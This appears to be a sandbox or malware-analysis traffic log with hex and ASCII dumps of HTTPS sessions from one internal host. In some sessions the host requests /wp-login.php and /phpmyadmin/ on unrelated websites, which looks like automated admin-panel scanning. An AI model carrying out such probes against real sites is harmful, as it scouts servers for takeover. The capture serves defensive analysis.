2023-12-22 20:14:59 UTC	577	IN	Data Raw: 37 63 38 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 0a 3c 73 63 72 69 70 74 20 69 64 3d 22 63 6f 6f 6b 69 65 79 65 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2d 63 6f 6f 6b 69 65 79 65 73 2e 63 6f 6d 2f 63 6c 69 65 6e 74 5f 64 61 74 61 2f 65 37 31 62 63 35 33 66 31 63 62 38 38 36 36 36 64 31 36 30 63 31 65 32 2f 73 63 72 69 70 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 0a 3c 6d 65 Data Ascii: 7c8a<!DOCTYPE html><html lang="en"><head><script id="cookieyes" type="text/javascript" src="https://cdn-cookieyes.com/client_data/e71bc53f1cb88666d160c1e2/script.js"></script><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><me
2023-12-22 20:14:59 UTC	1369	IN	Data Raw: 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 63 73 73 2f 68 64 76 33 2d 63 73 73 2f 72 65 62 6f 6f 74 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 63 73 73 2f 68 64 76 33 2d 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 3f 61 61 3d 32 30 32 31 2d 30 36 2d 30 39 61 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 63 73 73 2f 68 64 76 Data Ascii: ink rel="stylesheet" href="https://static.HugeDomains.com/css/hdv3-css/reboot.min.css"><link rel="stylesheet" href="https://static.HugeDomains.com/css/hdv3-css/style.css?aa=2021-06-09a"><link rel="stylesheet" href="https://static.HugeDomains.com/css/hdv
2023-12-22 20:14:59 UTC	1369	IN	Data Raw: 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 75 73 65 2e 74 79 70 65 6b 69 74 2e 6e 65 74 2f 7a 79 77 36 6d 64 73 2e 63 73 73 22 3e 0a 0a 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 67 74 61 67 2f 6a 73 3f 69 64 3d 55 41 2d 37 31 31 37 33 33 39 2d 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 0d 0a 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 3d 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 7c 7c 20 5b 5d 3b 0d 0a 66 75 6e 63 74 69 6f 6e 20 67 74 61 67 28 29 7b 64 61 74 61 4c 61 79 65 72 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 3b 7d 0d 0a 67 74 61 67 28 27 6a 73 27 2c 20 Data Ascii: "stylesheet" href="https://use.typekit.net/zyw6mds.css"><script async src="https://www.googletagmanager.com/gtag/js?id=UA-7117339-4"></script><script>window.dataLayer = window.dataLayer \|\| [];function gtag(){dataLayer.push(arguments);}gtag('js',
2023-12-22 20:14:59 UTC	1369	IN	Data Raw: 20 4d 6f 62 69 6c 65 20 53 65 61 72 63 68 22 20 62 6f 72 64 65 72 3d 22 30 22 20 6f 6e 63 6c 69 63 6b 3d 22 68 65 61 64 65 72 4d 6f 62 69 6c 65 53 65 61 72 63 68 4d 61 67 46 75 6e 63 28 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 65 61 72 63 68 2d 62 6f 78 20 22 20 69 64 3d 22 68 64 76 33 48 65 61 64 65 72 53 65 61 72 63 68 42 6f 78 44 69 76 49 44 22 3e 0a 0a 3c 66 6f 72 6d 20 61 63 74 69 6f 6e 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 64 6f 6d 61 69 6e 5f 73 65 61 72 63 68 2e 63 66 6d 22 20 6d 65 74 68 6f 64 3d 22 67 65 74 22 20 63 6c 61 73 73 3d 22 73 65 61 72 63 68 2d 66 6f 72 6d 22 20 69 64 3d 22 73 69 74 65 48 65 61 64 65 72 46 6f Data Ascii: Mobile Search" border="0" onclick="headerMobileSearchMagFunc(); return false;"></div><div class="search-box " id="hdv3HeaderSearchBoxDivID"><form action="https://www.HugeDomains.com/domain_search.cfm" method="get" class="search-form" id="siteHeaderFo
2023-12-22 20:14:59 UTC	1369	IN	Data Raw: 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 68 64 76 33 2d 69 6d 67 2f 70 68 6f 6e 65 2d 69 63 6f 6e 2e 70 6e 67 22 20 61 6c 74 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 74 65 6c 6c 2d 74 65 78 74 22 3e 2b 31 2d 33 30 33 2d 38 39 33 2d 30 35 35 32 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 6e 61 76 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 20 68 51 51 51 69 64 65 41 74 39 39 31 57 69 64 74 68 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6f 76 65 72 44 72 61 77 65 72 4c 61 79 20 22 20 6f 6e 63 6c 69 63 6b 3d 22 20 24 28 20 27 23 6e 61 76 54 6f 67 67 6c 65 27 20 29 2e 63 6c 69 63 6b 28 29 3b 20 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6f 76 65 72 6c 61 Data Ascii: HugeDomains.com/images/hdv3-img/phone-icon.png" alt><span class="tell-text">+1-303-893-0552</span></a></div></div></div><nav class="navbar hQQQideAt991Width"><div class="overDrawerLay " onclick=" $( '#navToggle' ).click(); "></div><div class="overla
2023-12-22 20:14:59 UTC	1369	IN	Data Raw: 3b 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 73 68 6f 70 70 69 6e 67 5f 63 61 72 74 2e 63 66 6d 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 20 22 20 69 64 3d 22 68 64 76 33 48 65 61 64 65 72 53 68 6f 70 70 69 6e 67 43 61 72 74 4c 69 6e 6b 49 44 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 53 68 6f 70 70 69 6e 67 20 43 61 72 74 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 6f 62 69 6c 65 2d 73 68 6f 77 22 3e 53 68 6f 70 70 69 6e 67 20 63 61 72 74 3c 2f 73 70 61 6e 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 68 64 76 33 2d 69 6d 67 2f 63 61 72 74 2e 70 6e 67 22 20 61 6c 74 Data Ascii: ;"><a href="https://www.HugeDomains.com/shopping_cart.cfm" class="whiteLink " id="hdv3HeaderShoppingCartLinkID" aria-label="Shopping Cart"><span class="mobile-show">Shopping cart</span><img src="https://static.HugeDomains.com/images/hdv3-img/cart.png" alt
2023-12-22 20:14:59 UTC	1369	IN	Data Raw: 72 6f 63 65 73 73 69 6e 67 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 4a 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 4a 5f 31 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 4a 5f 32 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 4a 5f 33 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 4a 5f 34 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 4a 5f 35 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 4a 5f 36 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 4a 5f 37 22 3e 3c 2f 64 69 Data Ascii: rocessing<div class="circularJ"><div class="circularJ_1"></div><div class="circularJ_2"></div><div class="circularJ_3"></div><div class="circularJ_4"></div><div class="circularJ_5"></div><div class="circularJ_6"></div><div class="circularJ_7"></di
2023-12-22 20:14:59 UTC	1369	IN	Data Raw: 20 64 69 66 2d 6c 22 3e 53 65 65 20 64 65 74 61 69 6c 73 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 72 65 64 69 74 69 20 22 3e 0a 3c 75 6c 3e 0a 3c 6c 69 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 6d 67 22 3e 0a 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 68 64 76 33 2d 69 6d 67 2f 33 30 64 61 79 73 6d 61 6c 6c 69 63 6f 2e 70 6e 67 22 20 61 6c 74 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 3e 33 30 2d 64 61 79 20 6d 6f 6e 65 79 20 62 61 63 6b 20 67 75 61 72 61 6e 74 65 65 3c 2f 73 70 61 6e 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 3e 0a 3c 64 69 76 Data Ascii: dif-l">See details</a></div><div class="crediti "><ul><li><div class="img"><img src="https://static.HugeDomains.com/images/hdv3-img/30daysmallico.png" alt></div><div class="content"><span>30-day money back guarantee</span></div></li><li><div
2023-12-22 20:14:59 UTC	1369	IN	Data Raw: 78 65 6a 2e 63 6f 6d 3c 2f 68 31 3e 0a 3c 70 20 63 6c 61 73 73 3d 22 64 2d 74 2d 6e 22 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 66 6f 72 20 73 61 6c 65 3a 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 72 65 65 6e 22 3e 24 34 2c 39 39 35 3c 2f 73 70 61 6e 3e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 61 62 6c 65 74 2d 62 6c 6f 63 6b 2d 73 22 3e 0a 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 63 65 6e 74 65 72 22 3e 42 75 79 20 6e 6f 77 20 66 6f 72 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 72 65 65 6e 22 3e 24 34 2c 39 39 35 3c 2f 73 70 61 6e 3e 20 6f 72 20 70 61 79 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 72 65 65 6e 22 3e 24 32 30 38 2e 31 33 3c 2f 73 70 61 6e 3e 20 70 65 72 20 6d 6f 6e 74 68 20 66 6f 72 20 Data Ascii: xej.com</h1><p class="d-t-n">This domain is for sale: <span class="green">$4,995</span></p></div><div class="tablet-block-s"><p class="text-center">Buy now for <span class="green">$4,995</span> or pay <span class="green">$208.13</span> per month for
2023-12-22 20:14:59 UTC	1369	IN	Data Raw: 6d 3a 32 35 70 78 3b 22 3e 0a 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 22 3e 6f 72 3c 2f 73 70 61 6e 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 61 62 6c 65 74 2d 62 6c 6f 63 6b 2d 72 69 67 68 74 22 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 70 61 79 6d 65 6e 74 2d 70 6c 61 6e 2d 73 65 74 75 70 2e 63 66 6d 3f 64 3d 56 69 78 65 6a 2e 63 6f 6d 22 20 63 6c 61 73 73 3d 22 62 74 6e 22 20 73 74 79 6c 65 3d 22 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 33 30 70 78 3b 20 77 69 64 74 68 3a 32 34 37 70 78 3b 20 6d 69 6e 2d 77 69 64 74 68 3a 32 34 37 70 78 3b 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 3b 20 22 20 69 64 3d 22 Data Ascii: m:25px;"><span style="font-size:16px;">or</span></div><div class="tablet-block-right"><a href="https://www.HugeDomains.com/payment-plan-setup.cfm?d=Vixej.com" class="btn" style="padding-right:30px; width:247px; min-width:247px; margin-top:10px; " id="

Session ID	Source IP	Source Port	Destination IP	Destination Port
129	192.168.2.4	61849	104.26.6.37	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:58 UTC	203	OUT	GET /domain_profile.cfm?d=yuejichem.com HTTP/1.1 Host: www.hugedomains.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:14:58 UTC	873	IN	HTTP/1.1 200 OK Date: Fri, 22 Dec 2023 20:14:58 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close cache-control: private vary: Accept-Encoding set-cookie: site_version_phase=108; expires=Mon, 16-Dec-2024 20:14:58 GMT; path=/ set-cookie: site_version=HDv3; expires=Mon, 16-Dec-2024 20:14:58 GMT; path=/ set-cookie: captcha-tracker=; expires=Thu, 21-Dec-2023 20:14:58 GMT; path=/ x-powered-by: ASP.NET lb: TclPrdLbHd3 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=KIlHodiHCHQUfpbX2jeC7SHvsLQGsQ3dB6ilLI47BKaHf7NfK7B%2Fp%2BGlKrlz5xqUPQaIOOOWJA3nsQ5pCxgtmhYBy6%2FIjJt43wGurKfP117YEf8Apu5iemLjtJSlvLNiBCQuRfk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 839b08c16ed474a0-MIA
2023-12-22 20:14:58 UTC	496	IN	Data Raw: 31 61 65 33 0d 0a 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6a 73 64 65 6c 69 76 72 2e 6e 65 74 2f 67 68 2f 66 61 6e 63 79 61 70 70 73 2f 66 61 6e 63 79 62 6f 78 40 33 2e 35 2e 37 2f 64 69 73 74 2f 6a 71 75 65 72 79 2e 66 Data Ascii: 1ae3<!doctype html><html lang="en"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/fancyapps/fancybox@3.5.7/dist/jquery.f
2023-12-22 20:14:58 UTC	1369	IN	Data Raw: 3a 2f 2f 73 74 61 74 69 63 2e 68 75 67 65 64 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 63 73 73 2f 68 64 76 33 2d 63 73 73 2f 72 65 73 70 6f 6e 73 69 76 65 2e 63 73 73 3f 72 3d 32 30 32 30 31 31 30 35 61 22 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 72 65 63 61 70 74 63 68 61 2f 61 70 69 2e 6a 73 22 20 61 73 79 6e 63 20 64 65 66 65 72 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 67 74 61 67 2f 6a 73 3f 69 64 3d 55 41 2d 37 31 31 37 33 33 39 2d 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f Data Ascii: ://static.hugedomains.com/css/hdv3-css/responsive.css?r=20201105a"><script src="https://www.google.com/recaptcha/api.js" async defer></script><script async src="https://www.googletagmanager.com/gtag/js?id=UA-7117339-4"></script><script> windo
2023-12-22 20:14:58 UTC	1369	IN	Data Raw: 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 68 65 61 64 65 72 3e 0a 3c 6d 61 69 6e 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 6d 61 69 6e 20 66 6c 61 74 2d 68 65 61 64 65 72 22 3e 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 61 62 6f 75 74 2d 70 61 67 65 20 67 75 69 64 65 2d 68 6f 6d 65 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 64 65 66 61 75 6c 74 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 2d 66 6c 65 78 20 61 69 2d 73 74 61 72 74 20 63 68 65 63 6b 6f 75 74 2d 62 6f 64 79 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 68 65 63 6b 6f 75 74 2d 63 6f 6e 74 65 6e 74 20 66 75 6c 6c 2d 77 69 64 74 68 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 62 6f 75 74 2d 70 61 67 65 2d 63 6f 6e 74 Data Ascii: /div></div></header><main class="site-main flat-header"><section class="about-page guide-home"><div class="container default"><div class="d-flex ai-start checkout-body"><div class="checkout-content full-width-container"><div class="about-page-cont
2023-12-22 20:14:58 UTC	1369	IN	Data Raw: 69 64 3d 22 63 69 72 63 75 6c 61 72 47 5f 34 22 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 47 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 69 64 3d 22 63 69 72 63 75 6c 61 72 47 5f 35 22 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 47 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 69 64 3d 22 63 69 72 63 75 6c 61 72 47 5f 36 22 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 47 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 69 64 3d 22 63 69 72 63 75 6c 61 72 47 5f 37 22 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 47 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 69 64 3d 22 63 69 72 63 75 6c 61 72 47 5f 38 22 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 47 22 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 2f 66 6f 72 6d 3e 0a Data Ascii: id="circularG_4" class="circularG"></div><div id="circularG_5" class="circularG"></div><div id="circularG_6" class="circularG"></div><div id="circularG_7" class="circularG"></div><div id="circularG_8" class="circularG"></div></div></button></form>
2023-12-22 20:14:58 UTC	1369	IN	Data Raw: 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 66 6f 72 6d 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 61 70 74 63 68 61 2d 66 6f 72 6d 22 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 61 70 74 63 68 61 2d 73 75 62 6d 69 74 2d 62 75 74 74 6f 6e 22 29 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 73 75 62 6d 69 74 42 75 74 74 6f 6e 20 3d 20 74 68 69 73 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 73 75 62 6d 69 74 53 70 69 6e 6e 65 72 20 3d 20 64 6f 63 75 6d 65 6e 74 2e Data Ascii: var form = document.getElementById("captcha-form"); document.getElementById("captcha-submit-button").addEventListener("click", function () { var submitButton = this; var submitSpinner = document.
2023-12-22 20:14:58 UTC	919	IN	Data Raw: 6c 61 74 66 6f 72 6d 2f 73 63 72 69 70 74 73 2f 6a 73 64 2f 6d 61 69 6e 2e 6a 73 27 2c 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 27 68 65 61 64 27 29 5b 30 5d 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 5f 63 70 6f 29 3b 22 3b 76 61 72 20 5f 30 78 68 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 69 66 72 61 6d 65 27 29 3b 5f 30 78 68 2e 68 65 69 67 68 74 20 3d 20 31 3b 5f 30 78 68 2e 77 69 64 74 68 20 3d 20 31 3b 5f 30 78 68 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 20 3d 20 27 61 62 73 6f 6c 75 74 65 27 3b 5f 30 78 68 2e 73 74 79 6c 65 2e 74 6f 70 20 3d 20 30 3b 5f 30 78 68 2e 73 74 79 6c 65 2e 6c 65 66 74 20 3d 20 30 3b 5f 30 78 68 2e 73 74 79 6c 65 2e 62 6f 72 64 65 72 20 Data Ascii: latform/scripts/jsd/main.js',document.getElementsByTagName('head')[0].appendChild(_cpo);";var _0xh = document.createElement('iframe');_0xh.height = 1;_0xh.width = 1;_0xh.style.position = 'absolute';_0xh.style.top = 0;_0xh.style.left = 0;_0xh.style.border
2023-12-22 20:14:58 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
130	192.168.2.4	61857	69.42.204.12	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:58 UTC	174	OUT	GET /wp-login.php HTTP/1.1 Host: bldowney.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:14:59 UTC	417	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 22 Dec 2023 20:14:58 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Frame-Options: SAMEORIGIN Set-Cookie: wordpress_test_cookie=WP%20Cookie%20check; path=/wordpress/ Upgrade: h2,h2c Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2023-12-22 20:14:59 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
131	192.168.2.4	61800	34.136.28.237	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:58 UTC	177	OUT	GET /wp-login.php HTTP/1.1 Host: ispsolucoes.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:14:59 UTC	110	IN	HTTP/1.1 404 Not Found Date: Fri, 22 Dec 2023 20:14:58 GMT Connection: close Transfer-Encoding: chunked
2023-12-22 20:14:59 UTC	3451	IN	Data Raw: 64 36 66 0d 0a 3c 21 2d 2d 0a 20 20 53 74 72 69 70 70 65 64 20 64 6f 77 6e 20 76 65 72 73 69 6f 6e 20 6f 66 20 68 74 74 70 73 3a 2f 2f 66 6c 75 74 74 65 72 66 6c 6f 77 2e 69 6f 2f 34 30 34 2e 68 74 6d 6c 0a 0a 20 20 57 65 20 72 65 6d 6f 76 65 64 20 61 20 6c 6f 74 20 6f 66 20 75 6e 6e 65 63 65 73 73 61 72 79 20 73 63 72 69 70 74 73 20 61 6e 64 20 73 65 74 20 3c 62 61 73 65 3e 20 74 6f 20 70 6f 69 6e 74 20 61 74 20 61 20 47 43 53 0a 20 20 6c 6f 63 61 74 69 6f 6e 20 77 69 74 68 20 61 6c 6c 20 64 65 70 65 6e 64 65 6e 63 69 65 73 2e 20 57 65 20 63 61 6e 27 74 20 73 65 72 76 65 20 74 68 65 6d 20 64 69 72 65 63 74 6c 79 20 66 72 6f 6d 20 66 6c 75 74 74 65 72 66 6c 6f 77 2e 69 6f 0a 20 20 62 65 63 61 75 73 65 20 6f 66 20 43 4f 52 53 2e 0a 2d 2d 3e 0a 0a 3c 21 44 Data Ascii: d6f... Stripped down version of https://flutterflow.io/404.html We removed a lot of unnecessary scripts and set <base> to point at a GCS location with all dependencies. We can't serve them directly from flutterflow.io because of CORS.--><!D

Session ID	Source IP	Source Port	Destination IP	Destination Port
132	192.168.2.4	61664	167.235.0.29	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:58 UTC	185	OUT	GET /phpmyadmin/ HTTP/1.1 Host: www.fotoestudiomiret.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:14:59 UTC	382	IN	Data Raw: 48 54 54 50 2f 31 2e 30 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 46 72 69 2c 20 32 32 20 44 65 63 20 32 30 32 33 20 32 30 3a 31 34 3a 35 39 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 58 2d 58 53 53 2d 50 72 6f 74 65 63 74 69 6f 6e 3a 20 31 3b 20 6d 6f 64 65 3d 62 6c 6f 63 6b 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 48 65 61 64 65 72 73 3a 20 2a 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4d 65 74 68 6f 64 73 3a 20 2a 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 52 65 71 75 65 73 74 2d 4d 65 74 68 6f 64 3a 20 2a 0d 0a 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 Data Ascii: HTTP/1.0 404 Not FoundDate: Fri, 22 Dec 2023 20:14:59 GMTServer: ApacheX-XSS-Protection: 1; mode=blockAccess-Control-Allow-Origin: Access-Control-Allow-Headers: 